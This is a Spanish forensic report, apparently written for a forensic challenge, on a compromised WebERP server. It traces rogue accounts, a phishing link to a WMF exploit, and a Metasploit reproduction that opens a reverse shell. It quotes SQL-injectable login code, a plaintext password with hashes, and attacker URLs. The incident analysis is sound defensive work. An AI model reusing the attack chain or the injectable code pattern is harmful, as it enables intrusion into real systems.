Tipo de suceso: Aciertos Origen del suceso: Security Categora del suceso: Seguimiento detallado Id. suceso: 592 Fecha: 26/01/2006 Hora: 06:03:12 p.m. Usuario: S-1-5-21-2780117151-1340924567-2512508698-500 Equipo: COUNTERS Descripcin: Se ha creado un proceso: Id. de proceso: 2220 Nombre de archivo de imagen: \Device\Harddisk1\DP(1)0-0+5\ERP\php-4.4.2installer.exe Id. de proceso creador: 1020 Nombre de usuario: Administrator Dominio: COUNTERS Id. de inicio de sesin: (0x0,0xDC31C) Para obtener ms informacin, vea el Centro de ayuda y soporte tcnico en http://go.microsoft.com/fwlink/events.asp.
Tipo de suceso: Aciertos Origen del suceso: Security Categora del suceso: Seguimiento detallado Id. suceso: 592 Fecha: 26/01/2006 Hora: 06:38:20 p.m. Usuario: S-1-5-21-2780117151-1340924567-2512508698-500 Equipo: COUNTERS Descripcin: Se ha creado un proceso: Id. de proceso: 3352 Nombre de archivo de imagen: C:\Documents and Settings\Administrator\Desktop\mysql-4.1.16-win32\Setup.exe Id. de proceso creador: 1020 Nombre de usuario: Administrator Dominio: COUNTERS Id. de inicio de sesin: (0x0,0xDC31C) Para obtener ms informacin, vea el Centro de ayuda y soporte tcnico en http://go.microsoft.com/fwlink/events.asp.
Cargamos en el visor de sucesos los archivos que extrajimos y comenzamos a ver los eventos. Despus de revisar la enorme lista de eventos, encontramos algunos que son interesantes, dada la cantidad de eventos la mejor forma de visualizarlo es con la siguiente grafica, en la cual se muestran los eventos relevantes conforme a una lnea de tiempo basada en el tiempo original de la maquina PST.
17
18
La actividad de los usuarios se seala marcando los cuadros mediante colores. Los colores se asignaron de la siguiente forma.
Administrador maru maik ver0k
Johnatan
reno
Al evaluar los eventos nos damos cuenta que en varias ocasiones el usuario Johnatan hace el cambio al usuario Administrador (Cierra sesin e inmediatamente la abre como Administrador), por lo que suponemos que dicho usuario es quien administraba el servidor. Destacamos los siguientes eventos: El da 26/01/2006 6:00 PM el usuario Administrador Instala apache, 8:03 Instalacin de PHP,8:38 Instalacin de MySQL. El da 31/01/2006 10:45 PM Administrador Utiliza wget, 12:51 Instala y accede al BitTorrent. El da 01/02/2006 10:47 el administrador ejecuta de wget. De 12:50 Instalacin de Firefox. El da 02/02/2006 de 5:51 a 6:27 el Administrador instala actualizaciones de Windows. El da 04/02/2006 El administrador 1:17 Pone en marcha el DNS, crea y activa la cuenta Postgres
Finalmente el da 05/02/2006 12:45:30 p.m. el usuario Jonhatan crea al usuario ver0k y comienza actividad sospechosa del usuario ver0k. Ojo el usuario ver0k se creo con el usuario Jonhatan como lo muestra el siguiente evento:
Tipo de suceso: Aciertos Origen del suceso: Security Categora del suceso: Administracin de cuentas Id. suceso: 632 Fecha: 05/02/2006 Hora: 12:45:30 p.m. Usuario: S-1-5-21-2780117151-1340924567-2512508698-1006 Equipo: COUNTERS Descripcin: Miembro de grupo global habilitado de seguridad agregado: Nombre del miembro: Id. del miembro: S-1-5-21-2780117151-1340924567-2512508698-1024 Nombre de cuenta destino: None Dominio de destino: COUNTERS Id. de cuenta destino: %{S-1-5-21-2780117151-1340924567-2512508698-513} Nombre de usuario llamador: Johnatan Dominio del llamador: COUNTERS Id. de inicio de sesin del llamador: (0x0,0x3DF69A) Privilegios: -
19
Tipo de suceso: Aciertos Origen del suceso: Security Categora del suceso: Administracin de cuentas Id. suceso: 624 Fecha: 05/02/2006 Hora: 12:45:30 p.m. Usuario: S-1-5-21-2780117151-1340924567-2512508698-1006 Equipo: COUNTERS Descripcin: Cuenta de usuario creada: Nombre de cuenta nueva: ver0k Dominio nuevo: COUNTERS Id. de cuenta nueva: S-1-5-21-2780117151-1340924567-2512508698-1024 Nombre de usuario llamador: Johnatan Dominio del llamador: COUNTERS Id. de inicio de sesin del llamador: (0x0,0x3DF69A) Privilegios Tipo de suceso: Aciertos Origen del suceso: Security Categora del suceso: Administracin de cuentas Id. suceso: 636 Fecha: 05/02/2006 Hora: 12:45:53 p.m. Usuario: S-1-5-21-2780117151-1340924567-2512508698-1006 Equipo: COUNTERS Descripcin: Miembro de grupo local habilitado de seguridad agregado: Nombre del miembro: Id. del miembro: S-1-5-21-2780117151-1340924567-2512508698-1024 Nombre de cuenta destino: Administrators Dominio de destino: Builtin Id. de cuenta destino: BUILTIN\Administradores Nombre de usuario llamador: Johnatan Dominio del llamador: COUNTERS Id. de inicio de sesin del llamador: (0x0,0x3DF69A) Privilegios: -
Como podemos ver el usuario Johnatan no solo crea la cuenta ver0k, si no que adems la agrega al grupo de administradores. El usuario ver0k ingresa al sistema inmediatamente despus de ser creado y se mantiene en el hasta aproximadamente las 15:44 HRS PST (O al menos a esa hora aparece el ultimo registro). Verificando los eventos el registro de seguridad (SecEvent.Evt) podemos rastrear el paso de este usuario a travs del sistema, a fin de que esta actividad quede mas clara la exponemos ms adelante junto a ms evidencia recolectada.
3.4
Reconstruccin de la aplicacin ERP.
A fin de entender mejor el estado de la aplicacin reconstruiremos ahora la aplicacin WebERP, para ello extraemos el directorio htdocs completo del Apache, y lo montamos en el Apache que tenemos funcionando en nuestra maquina de laboratorio (El que se instalo con el XAMPP), tambin extraemos el directorio data de MySQL y de ah tomamos la informacin dentro de weberp y los archivos InnoDB (counters-bin.index, ib_logfile1, counters-bin.000001, counters.log, ibdata1, ib_logfile0, counters.err), que anteriormente mencionamos. Y los colocamos en nuestro servidor de MySQL (Que se instalo con el XAMPP). Como
20
vimos la aplicacin utilizaba un usuario weberp sin password, as que creamos en nuestra base de datos dicho usuario y arrancamos la aplicacin. La siguiente es una imagen de como se lucia la aplicacin:
El problema es que necesitamos un usuario para acceder, antes de crearlo directo en la base de datos damos una vistazo al archivo counters.log que es el log del MySQL y en el quedan registradas las transacciones que se llevan a cabo en el servidor, encontramos actividad del 06/02/03 19:57:47 al 06/02/05 14:20:06, verificando la estructura de la base de datos weberp, encontramos que los usuarios se registran en la tabla www_users as que buscamos en el log transacciones que refieran esta tabla. Pronto encontramos transacciones como la que sigue:
Connect weberp_us@localhost as anonymous on Init DB weberp Query SHOW STATUS Query SHOW INNODB STATUS Query SELECT www_users.fullaccess, www_users.customerid, www_users.lastvisitdate, www_users.pagesize, www_users.defaultlocation, www_users.branchcode, www_users.modulesallowed, www_users.blocked, www_users.realname, www_users.theme, www_users.displayrecordsmax, www_users.userid, www_users.language FROM www_users WHERE www_users.userid='acontreras' AND (www_users.password='067f1396a8434994b5c1c69edfd29c17571993ee' OR www_users.password='c0ntr3t0') 72 Query UPDATE www_users SET lastvisitdate='2006-02-03 19:59:18' WHERE www_users.userid='acontreras' AND www_users.password='067f1396a8434994b5c1c69edfd29c17571993ee' 72 72 5 5 72
21
En ese fragmento del log se puede ver como la aplicacin realiza una conexin a la base de datos verifica la existencia del usuario y actualiza el campo lastvisitdate, que es un registro de las visitas del usuario. En este punto encontramos otro grabe fallo de seguridad, esta vez en la aplicacin WebERP ya que segn podemos ver en las lneas AND (www_users.password = '067f1396a8434994b5c1c69edfd29c17571993ee' OR www_users.password='c0ntr3t0') el password esta siendo recibido en texto claro. Nos referimos a la documentacin de la aplicacin en www.weberp.org y encontramos en el archivo session.inc que maneja la autenticacin el siguiente cdigo.
$sql = "SELECT www_users.fullaccess, www_users.customerid, www_users.lastvisitdate, www_users.pagesize, www_users.defaultlocation, www_users.branchcode, www_users.modulesallowed, www_users.blocked, www_users.realname, www_users.theme, www_users.displayrecordsmax, www_users.userid, www_users.language FROM www_users WHERE www_users.userid='" . $_POST['UserNameEntryField'] . "' AND (www_users.password='" . CryptPass($_POST['Password']) . "' OR www_users.password='" . $_POST['Password'] . "')"; $Auth_Result = DB_query($sql, $db);
La aplicacin encripta el password pero tambin tiene la opcin de dejarlo como texto plano, esto significa que aunque en la base de datos el password se encuentra encriptado, cuando los usuarios acceden a la aplicacin el passowrd se envi por la red en texto plano, lo que supone un riesgo en caso de que alguien estuviese realizando sniffing sobre la red. Aprovechando esta informacin desistimos de crear un usuario y mejor usamos este que encontramos. Al acceder podemos ver la lista de usuarios de la aplicacin en el modulo setup en la opcin user accounts.
22
Titulo: Informe Tcnico Fecha: 21/Mar/ 2006 Los siguientes usuarios existan en la aplicacin:
User Login juma carsel chtorret sarnua ncanes andre amed gabsa gruvalcaba Jehern majogar mamuria maubaro mavep amirac acontreras admin egavilan rodid roxar dizav eduajt ladelga Full Name Juan Morales Fierro Carmen Serrano Luna Chema Torret Sara Nez Aldana Napolen Canes Andrea Escalera Nava Antonio Medina Ocaa Gabriela Sandoval Portillo Gumaro Ruvalcaba Jess Hernandez Cuevas Mara Jos Garca Rubio Miguel Angel Muria Torres Mauricio Barrios Santiago Mayra Velzquez Prieto Astrid Miranda Acua Alberto Contreras Zacaras admin Ernesto Gaviln Rodrigo Ibarra Daz Roxana Aguilar de la Riva Diego Zrate Vite Eduardo Jimnez Tapia Luis Ignacio Aguiaga Delgado Last Visit // // 03/02/2006 // 12/03/2006 // 03/02/2006 // 03/02/2006 // 03/02/2006 03/02/2006 03/02/2006 03/02/2006 // 19/03/2006 // // 03/02/2006 02/02/2006 // 03/02/2006
Security Group Bancos Compras Compras Compras Gerente de Compras y Abatecimiento Gerente de Recursos Humanos Inventario Inventario Inventario Inventario Inventario Inventario Inventario Inventario Secretaria System Administrator System Administrator System Administrator System Administrator System Administrator Ventas Ventas
03/02/2006 Ventas
Como podemos ver existen 5 cuentas de administrador en el sistema, marcamos en rojo la cuenta admin., ya que resulta sospechosa debido a que no tiene ningn dato que haga referencia al usuario. Todas las cuentas incluyen el nombre, telfono y otros generales de los usuarios a los que pertenecen, esta no, aunque al parecer esta cuenta no ha sido usada, podemos suponer que esta es la cuenta sospechosa que encontr el administrador ya que no sigue tiene el mismo patrn con el cual fueron creadas las dems cuentas. Buscaremos mas informacin de la creacin de dicha cuenta colectando eventos del WebERP.
3.5
Colectando eventos del WebERP.
Colectaremos ahora eventos referente a la aplicacin WebERP, para ello analizaremos los logs del Apache y del MySQL, los archivos son el access.log error.log en el directorio logs de apache y counters.log en el directorio data de MySQL Buscaremos hacer coincidir los tiempos. Nuevamente exponemos esta actividad mediante un diagrama:
23
24
Esta ves marcamos en verde el trfico hacia el WebServer que no resulta relevante, marcamos en amarillo cuando se generaba trfico desde IPs externas a la red en la que se encontraba el servidor, o se manipulaban usuarios, permisos o contraseas y marcamos en rojo cuando se encuentra evidencia clara de un ataque hacia el servidor, los siguientes eventos destacan: El da 28/01/06 de 16:51 a 16:53 IP 192.168.100.180 se encuentra cadena "\xff\xf4\xff\xfd\x06quit"un probable intento de exploit al servidor. Note que la IP es una IP privada y pertenece a la misma Subred del servidor. El da 29/01/06 de 08:01 IP 201.141.48.75 se encuentra en el log CONNECT msa-mx8.hinet.net:25 HTTP/1.0. Esta cadena es un intento desde una IP externa para usar el servidor como Proxy para el envi de SPAM. Encontramos intentos similares el da 30 a las 07:40 desde la IP 218.169.71.114, el da 04/02/06 a las 20:31 desde 61.228.157.221, 22:04 desde 220.134.13.167. En estos intentos el atacante trata de utilizar el servidor como proxy para conectarse a un servidor de correo externo, esto con la probable finalidad de enviar SPAM a travs de el. El da 29/01/2006 a las 17:01 desde 134.186.42.18 se encuentra "GET /w00tw00t.at.ISC.SANS.DFind:)" la cual es una firma de un scanner de vulnerabilidades mas informacin sobre su uso se puede encontrar en http://www.symantec.com/avcenter/venc/data/hacktool.dfind.html . El da 30/01/2006 de 17:28 a 17:31 desde 192.168.100.144 se llevo a cavo un escaneo de vulnerabilidades muy probablemente usando el scanner Nikto (http://www.cirt.net/code/nikto.shtml). Ntese que este viene de una IP de la misma subred que el servidor. El dia 04/02/2006 de 14:04 a 14:26 se encuentra un segundo escaneo de vulnerabilidades desde 84.18.17.15, esta ves usando la herramienta NESSUS (http://www.nessus.org), note que esta vez el ataque viene desde una IP externa.
Finalmente el da 05/02/2006 a las 13:57 se crea la cuenta 'admin" desde 70.107.249.150. En el diagrama podemos ver adems cuando se manipularon los usuarios, para ello buscamos hits del WebServer sobre el script /weberp/WWW_Users.php que segn la documentacin del WebERP es el que manipula los usuarios. Despus buscamos hacer coincidir las fechas con las transacciones guardadas en Counters.log (Aun que se dispone de poca historia), al seguir la historia contenida en el access.log de apache, y revisando lo que hacen los scripts del WebERP que recibieron hits, podemos ver que aproximadamente hasta el da 5 de Febrero se estuvo trabajando en la configuracin de la aplicacin. La mayor parte de este trabajo se llevo a cabo con la cuenta de administrador acontreras. Ubicamos la creacin del usuario admin, en los siguientes fragmentos de los logs access.log y counters.log.
25
060205 13:57:51
1389 Connect weberp_us@localhost as anonymous on 1389 Init DB weberp 1389 Query SELECT www_users.fullaccess, www_users.customerid, www_users.lastvisitdate, www_users.pagesize, www_users.defaultlocation, www_users.branchcode, www_users.modulesallowed, www_users.blocked, www_users.realname, www_users.theme, www_users.displayrecordsmax, www_users.userid, www_users.language FROM www_users WHERE www_users.userid='acontreras' AND (www_users.password='067f1396a8434994b5c1c69edfd29c17571993ee' OR www_users.password='c0ntr3t0') 1389 Query UPDATE www_users SET lastvisitdate='2006-02-05
13:57:51' WHERE www_users.userid='acontreras' AND www_users.password='067f1396a8434994b5c1c69edfd29c17571993ee' 060205 13:57:52 1389 Query SELECT tokenid FROM securitygroups WHERE secroleid = 8 1389 Quit 1390 Connect weberp_us@localhost as anonymous on 1390 Init DB weberp 1390 Query SELECT confname, confvalue FROM config 1390 Query SELECT coyname, gstno, regoffice1, regoffice2, regoffice3, regoffice4, regoffice5, regoffice6, telephone, fax, email, currencydefault, debtorsact, pytdiscountact, creditorsact, payrollact, grnact, exchangediffact, purchasesexchangediffact, retainedearnings, freightact, gllink_debtors, gllink_creditors, gllink_stock FROM companies WHERE coycode=1
26
060205 14:00:15 secroleid
1398 Connect weberp_us@localhost as anonymous on 1398 Init DB weberp 1398 Query SELECT secroleid, secrolename FROM securityroles ORDER BY
1398 Query
INSERT INTO www_users (userid, realname, customerid, branchcode, password, phone, email, pagesize, fullaccess, defaultlocation, modulesallowed, displayrecordsmax, theme, language) VALUES ('admin', 'admin', '', '', '5542a545f7178b48162c1725ddf2090e22780e25', '', '', 'A4', 8, 'AGS', '1,1,1,1,1,1,1,1,', 50, 'fresh', 'en_GB') 1398 Query SELECT userid, realname, phone, email, customerid, branchcode, lastvisitdate, fullaccess, pagesize FROM www_users 1398 Query SELECT loccode, locationname FROM locations 1398 Quit [05/Feb/2006:13:57:37 -0800] "GET /web-erp/css/professional/login.css HTTP/1.1" [05/Feb/2006:13:57:37 [05/Feb/2006:13:57:37 [05/Feb/2006:13:57:37 [05/Feb/2006:13:57:37 [05/Feb/2006:13:57:37 [05/Feb/2006:13:57:52 [05/Feb/2006:13:57:52 [05/Feb/2006:13:57:52 -0800] -0800] -0800] -0800] -0800] -0800] -0800] -0800] "GET /web-erp/css/webERP.gif HTTP/1.1" 200 2506 "GET /web-erp/logo_server.jpg HTTP/1.1" 200 8203 "GET /web-erp/css/bg.gif HTTP/1.1" 200 1275 "GET /web-erp/css/spacer.gif HTTP/1.1" 200 43 "GET /favicon.ico HTTP/1.1" 404 283 "POST /web-erp/index.php HTTP/1.1" 200 76 "GET /web-erp/index.php? HTTP/1.1" 200 6628 "GET /web-erp/css/fresh/default.css HTTP/1.1" 200
70.107.249.150 - 200 1394 70.107.249.150 - 70.107.249.150 - 70.107.249.150 - 70.107.249.150 - 70.107.249.150 - 70.107.249.150 - 70.107.249.150 - 70.107.249.150 - 6543 70.107.249.150 - 70.107.249.150 - HTTP/1.1" 200 1548 70.107.249.150 - HTTP/1.1" 200 976 70.107.249.150 - HTTP/1.1" 200 434 70.107.249.150 - HTTP/1.1" 200 1383 70.107.249.150 - 70.107.249.150 - 183 70.107.249.150 - 200 4083 70.107.249.150 - 70.107.249.150 - HTTP/1.1" 200 9083
[05/Feb/2006:13:57:52 -0800] "GET /web-erp/favicon.ico HTTP/1.1" 200 1406 [05/Feb/2006:13:57:52 -0800] "GET /web-erp/css/fresh/images/transactions.gif [05/Feb/2006:13:57:52 -0800] "GET /web-erp/css/fresh/images/menucurve.gif [05/Feb/2006:13:57:52 -0800] "GET /web-erp/css/fresh/images/reports.gif [05/Feb/2006:13:57:52 -0800] "GET /web-erp/css/fresh/images/maintenance.gif [05/Feb/2006:13:57:52 -0800] "GET /web-erp/css/webERPsm.gif HTTP/1.1" 200 357 [05/Feb/2006:13:57:52 -0800] "GET /web-erp/css/fresh/bullet.gif HTTP/1.1" 200 [05/Feb/2006:13:57:54 -0800] "GET /web-erp/PDFDeliveryDifferences.php? HTTP/1.1" [05/Feb/2006:13:57:57 -0800] "GET /web-erp/index.php? HTTP/1.1" 200 6628 27 [05/Feb/2006:13:58:00 -0800] "GET /web-erp/index.php?&Application=system
1763 70.107.249.150 - HTTP/1.1" 200 1751 70.107.249.150 - 16483 70.107.249.150 - 70.107.249.150 - 70.107.249.150 - 70.107.249.150 - 70.107.249.150 - 70.107.249.150 - 1415 70.107.249.150 - 200 8203
[05/Feb/2006:13:58:00 -0800] "GET /web-erp/css/fresh/images/inventory.gif [05/Feb/2006:13:58:02 -0800] "GET /web-erp/SystemParameters.php? HTTP/1.1" 200 [05/Feb/2006:13:58:06 [05/Feb/2006:13:58:10 [05/Feb/2006:13:59:44 [05/Feb/2006:14:00:15 [05/Feb/2006:14:00:59 [05/Feb/2006:14:00:59 -0800] -0800] -0800] -0800] -0800] -0800] "GET /web-erp/index.php? HTTP/1.1" 200 9083 "GET /web-erp/WWW_Users.php? HTTP/1.1" 200 14613 "POST /web-erp/WWW_Users.php? HTTP/1.1" 200 14760 "POST /web-erp/WWW_Users.php? HTTP/1.1" 200 14951 "GET /web-erp/Logout.php? HTTP/1.1" 200 2449 "GET /web-erp/css/fresh/login.css HTTP/1.1" 200
[05/Feb/2006:14:00:59 -0800] "GET /web-erp/companies/weberp/logo.jpg HTTP/1.1"
Como podemos observar al momento de realizar el INSERT con los datos del usuario a la base de datos, existe actividad en WWW_Users.php desde 70.107.249.150 de ah deducimos que el usuario se creo desde esta IP. Un momento antes se haba conectado el usuario acontreras en el momento en que se validaba el usuario en la base de datos, exista actividad en index.php especficamente se uso un POST (Envi de informacin), como no existe indicio de que otro usuario se hubiese conectado en ese momento. Deducimos que la cuenta admin fue creada por usando la cuenta acontreras la cual tenia privilegios de administrador, conectndose desde 70.107.249.150.
3.6
Colectando evidencia del File System.
Ahora vamos recopilar evidencia revisando directamente en el File System que se nos proporciono, para ello usaremos la herramienta Autopsy que instalamos en nuestra maquina virtual con Knoppix, puede encontrar informacin de la herramienta en http://www.sleuthkit.org/autopsy , en el informe tcnico que elabore para el anterior reto forense (V.2.0), realice una descripcin de como crear el caso y usar la herramienta, por ello no abundare en esos detalles esta ocasin, sin desea saber un poco mas de como usar la herramienta, tambin puede consultar ese informe en http://www.seguridad.unam.mx/eventos/reto/retov2.dsc . Creamos un caso en autopsy y cargamos la imagen cuidando de sealar que se trata de un NTFS. Vamos a revisar el contenido de las carpetas de usuario las cuales se encuentran en Documentes And Settings, desde Knoppix encontramos lo siguiente:
/mnt/forense/Documents and Settings# total 0 drwx------ 1 root root 4096 Feb 4 drwx------ 1 root root 4096 Jan 26 drwx------ 1 root root 49152 Jan 26 drwx------ 1 root root 4096 Feb 2 drwx------ 1 root root 4096 Jan 26 drwx------ 1 root root 4096 Jan 26 drwx------ 1 root root 4096 Feb 3 drwx------ 1 root root 4096 Jan 26 drwx------ 1 root root 4096 Feb 4 drwx------ 1 root root 4096 Feb 2 drwx------ 1 root root 4096 Feb 5 ls -l 16:26 01:40 01:42 20:53 01:58 01:58 21:11 17:59 17:46 21:34 15:47 Administrator All Users Default User Johnatan LocalService NetworkService maick maru postgres reno ver0k
28
Como vemos los existen directorios para los usuarios Johnatan, Administrador, maick, maru, reno, ver0k. Sabemos que el usuario postgres se utilizo solamente para la aplicacin Postgres (Debido a que as lo muestran los eventos), las dems cuentas son creadas por el sistema. Revisaremos de cada usuario el contenido de la carpeta My Documents (Documents and Settings/Usuario/My Documents). Para el usuario Administrador encontramos algunos documentos e imgenes, algunas de ellas de ndole sexual, tambin existe ah una carpeta Sof7w4r3 que contiene las siguientes herramientas de administracin de red: Tcpview.exe, cports.exe, languardnss6.exe tambin esta el paquete de instalacin de Postgres postgresql-8.1.0-2.zip. Existe tambin una carpeta updates que contiene algunos de los parches que se le instalaron a Windows. Hay una carpeta My Videos, donde encontramos algunos videos de entretenimiento, imgenes ndole sexual y animacines de la serie animada de Huevo Cartoon (http://www.huevocartoon.com ). Algunos de los archivos encontrados:
Documents and Settings/Administrator/My Documents/My Videos ANTAGONISTAS JESUS.EXE mordida.exe Bsb.exe Juego Huevo.exe muchosregalos.exe DIVORCIA.EXE Muchos Huevos.exe no existieras.exe El antiestres de los huevos.exe Osama Bin Huevo.exe no muerdo.exe Perdonam.exe Huevo -Te amo.exe no te azotes.exe Poetas Huevos 2a Edicion.exe Huevo Amor Maduro.exe poetas[1].exe Huevo Cartoon - Mundial de Huevos.exe Porraparamama.exe recuperate.exe Huevo Frito.exe Te quiero como a mi huevo.exe saludosamama.exe Huevo Perdoname.exe Tenorios.exe sarten.exe Huevo Toi.exe TestdeRavenH.exe tahnisetup.exe Huevo no es personal.exe amigas de huevos.exe temoc.exe el huevo tenorio.exe elsalon.exe fiesta en el antro.exe frasquitos.exe hasta la muerte.exe haz algo.exe huevo Cremas.exe huevo ojal?.exe huevo sarten.exe huevo.exe huevos famosos.exe
Para el usuario Johnatan encontramos en My Documents una carpeta Dr. Salamo con algunos documentos de Office y una carpeta imgenes con imgenes y videos de ndole sexual. Para el usuario reno encontramos bastantes documentos de Office. Para el usuario ver0k, maru, y el usuario maik no encontramos nada. Dado el contenido que encontramos en algunas carpetas (Videos e imgenes de ndole sexual y animaciones que regularmente se consiguen en la Web), y dado que encontramos varios eventos en SecEvent.Evt que nos indican que los usuarios utilizaron Internet Explorer y Mozilla Firefox vamos a revisar el Historial y cache de los navegadores. Comenzamos revisando el Historial de
29
Internet Explorer, para ello buscamos dentro de la carpeta de cada usuario ingresamos Local Settings\History\History.IE5\ ah veremos varias carpetas con nombres de fechas:
Documents and total 0 0 drwx-----0 drwx-----0 drwx-----0 drwx-----0 drwx-----0 drwx-----0 drwx-----0 -rw------0 -rw------Settings/Administrator/Local Settings/History.IE5 1 1 1 1 1 1 1 1 1 root root root root root root root root root root 0 root 0 root 0 root 0 root 0 root 0 root 0 root 113 root 65536 Jan 30 16:34 MSHist012006012320060130 Jan 30 16:34 MSHist012006013020060131 Feb 1 13:25 MSHist012006020120060202 Feb 2 21:28 MSHist012006020220060203 Feb 3 13:24 MSHist012006020320060204 Feb 4 16:21 MSHist012006020420060205 Feb 5 14:51 MSHist012006020520060206 Jan 26 01:41 desktop.ini Feb 5 18:32 index.dat
Dentro de cada una existe un archivo index.dat que contiene el historial de Internet Explorer, extraemos va secure copy la estructura completa de History.IE5. El anlisis lo llevaremos a cabo usando la herramienta IEHistoryView, esta herramienta nos permite cargar los archivos index.dat y ver contenido as como las fechas, mas informacin de la herramienta puede ser encontrada en http://www.nirsoft.net/utils/iehv.html .
Vamos revisando cada archivo index.dat principal cargndolo con la opcin select history flder. Para el usuario maru no encontramos nada. Para el usuario administrador. Encontramos algunos accesos a Google, http://search.bittorrent.com, al mismo WebERP, y finalmente algunos accesos a las imgenes de contenido sexual que habamos encontrado dentro de la carpeta del usuario Johnathan (ile:///C:/Documents%20and%20Settings/Johnatan/My%20Documents/imagenes/o verlay_3_2006020107031.jpg).
30
Para el usuario maick el usuario encontramos algunos hits www.google.com. Para el usuario reno encontramos acceso a algunos de sus documentos y a las imgenes de ndole sexual contenidas en file:///C:/Documents and Settings/reno/My Documents/imagenes/overlay_2_2006020110004.jpg , pero todo dentro de la maquina. Para el usuario Johnatan encontramos cosas interesantes, entre las 12:26 PST y las 13:06 PST del da 05/02/06 dicho usuario ingreso al servicio de correo de Yahoo desde el servidor (Sabemos esto porque en el historial encontramos varios Hits hacia http://e1.f376.mail.yahoo.com) , hay algo que llama mucho la atencin y es que a las 12:41 PST ingreso a la siguiente direccin http://70.107.249.150/clientes.wmf, a las 12:44 PST http://70.107.249.150:8080/clientes.wmf e inmediatamente despus a
http://70.107.249.150:8080/GPlw9OgYR6/uSvcCeC1V18W/bfKJ0KMsfYBZnaFKx6dZs/FHBwenHfCEt6do1Z/e9zhOEMQ052
. Esta actividad parece bastante sospechosa debido a que dicha direccin 70.107.249.150 es la misma desde la que descubrimos que se creo la cuenta admin. Adems de que la fecha y el horario coincide con la creacin de la misma (Mas o menos una hora de diferencia) adems de coincidir con la creacin del usuario ver0k la cual se efectu a las 12:45 PST de ese mismo da.
zYwSU5Oi/AUWWckI2mU/LQ9ClubslAJKIa2jdYtSFExez4sRyL.tiff
Para el usuario ver0k, encontramos que accedi a todas las imgenes de ndole sexual que se encontraban en el servidor, adems de haber accedido a la Web de www.huevocartoon.com, MSN , y a algunos documentos contenidos en el flder de reno. Llama mucho la atencin que tambin accedi a los siguientes archivos, file:///C:/apache/Apache/htdocs/web-erp/config.php y file:///C:/apache/Apache/htdocs/web-erp/AccountGroups.php. Para complementar la informacin que hasta ahora tenemos, revisamos el cache de Internet Explorer del usuario Johnatan, para ello usamos el File Anlisis de autopsy y revisamos el contenido de la carpeta Local Settings\Temporary Internet\ Content.IE5 . Del cache especficamente del de ese da pudimos rescatar alguna informacin. Entre ella este correo de Yahoo:
De: Para: Asunto: Fecha: Johnny: Esta es la liga correcta, Por favor baja el catalogo que esta en http://70.107.249.150:8080/clientes.wmf Alberto Lopez Director General Electronica y Computacion S.A. de C.V. alopez@eycsa.com.mx Aadir a Libreta de contactos jonathan.tezca@yahoo.com Urgente!! (correccion) Sun, 5 Feb 2006 14:42:47 -0600 (CST)
31
Vemos la fecha del correo Sun, 5 Feb 2006 14:42:47 -0600 (CST), la fecha es la misma en la que se crearon los usuarios ver0k en el S.O.y admin en el WebERP, y en cuanto a la hora marca 14:42 en tiempo CST, para cambiarlo a tiempo PST le restamos dos horas mas dando la hora 12:42 PST que tambin coincide con el tiempo en que se encontr la actividad sospechosa. La direccin a la que se hace referencia en el correo es la misma desde la que se creo la cuenta admin (http://70.107.249.150:8080/clientes.wmf ). Vemos que la extensin del archivo es wmf (Windows Meta File), buscamos en Google para ver si existe alguna vulnerabilidad sobre este tipo de archivo, y encontramos informacin de una vulnerabilidad relacionada a este tipo de archivos que la versin de Windows 2003 y podra permitir la ejecucin de cdigo remoto. La informacin de esta vulnerabilidad se encuentra en el Microsoft Security Bulletin MS06-001 (www.microsoft.com/technet/security/bulletin/MS06-001.mspx). Bsicamente el problema se encuentra en la forma en que el Visor de Imgenes y de Fax de Windows procesa este tipo de archivo, el fallo se produce al hacer una llamada especial a la funcin SETABORTPROC, existe un parche de seguridad de Microsoft para este fallo, es el KB912919, durante la evaluacin del sistema vimos que parches se encontraban instalados en el equipo y el KB912919 no se encuentra instalado por tanto el sistema era vulnerable a este fallo. Buscando mas informacin en Google, encontramos con que ha un exploit sido portado a una versin del Metasploit Framework por H D Moore, el Metasploit es una Framework en el que se han portado gran cantidad de exploits y esta pensado en ser una herramienta que permita evaluar seguridad y experimentar con los exploits (Puede encontrar mas informacin en http://www.metasploit.com ). Este exploit permite levantar un servidor escuchando en el puerto 8080, recibe una llamada y regresa un archivo especialmente formado para explotar esta vulnerabilidad, este archivo explota la vulnerabilidad e infecta la maquina con el troyano Bloodhound.Exploit.56 (http://securityresponse.symantec.com/avcenter/venc/data/pf/bloodhound.exploit.56.html ) el cual enva una terminal de regreso al atacante. Bsicamente el atacante instala el Metasploit Framework, ejecuta el exploit, enva a la victima una URL del servidor que levanta el Metasploit y espera a que la victima visite URL, cuando la victima visita la URL recibe un archivo de imagen especialmente formado (El nombre del archivo es una larga cadena aleatoria con terminacin .tiff para asegurar que sea procesado por el Visor de Imgenes y de Fax de Windows), inyecta el troyano y enva una terminal shell de regreso al atacante, con los privilegios del usuario que se encontrase en la maquina.
32
Para no dejar esto en teora descargamos una versin del Metasploit y realizamos la siguiente prueba, instalamos el Metasploit en la maquina virtual con Knoppix y ejecutamos el exploit:
Desde la maquina con Windows abrimos un navegador y ejecutamos la direccin de la maquina virtual, http://192.168.247.128:8080/clientes.wmf, al instante el Antivirus Norton detecta la amenaza (Note que el objeto tiene extensin .tiff):
33
Como nos interesa ver el funcionamiento del exploit, desactivamos el Antivirus y repetimos la prueba:
34
Podemos ver en la pantalla de Knoppix (Al fondo) como obtuvimos una terminal de Windows con el usuario que ejecuto el exploit, tambin podemos ver como el Firewall de Windows, a pesar de estar activo permiti el exploit y no mando ninguna alerta. Recordemos ahora que el usuario Johnatan tenia en el historial de Internet Explorer un acceso a
http://70.107.249.150:8080/GPlw9OgYR6/uSvcCeC1V18W/bfKJ0KMsfYBZnaFKx6dZs/FHBwenHfCEt6do1Z/e9zhOEMQ052 zYwSU5Oi/AUWWckI2mU/LQ9ClubslAJKIa2jdYtSFExez4sRyL.tiff , Como podemos ver el servidor escuchaba en el puerto 8080 y envi un archivo con un nombre largo y posiblemente aleatorio con extensin .tiff . Si el usuario Johnatan fue vulnerado envi una terminal al atacante con los privilegios de la cuenta Johnatan, Y que privilegios tenia dicho usuario? Para saberlo colectamos un evento del archivo SecEvent.Evt de un inicio de sesin de dicho usuario:
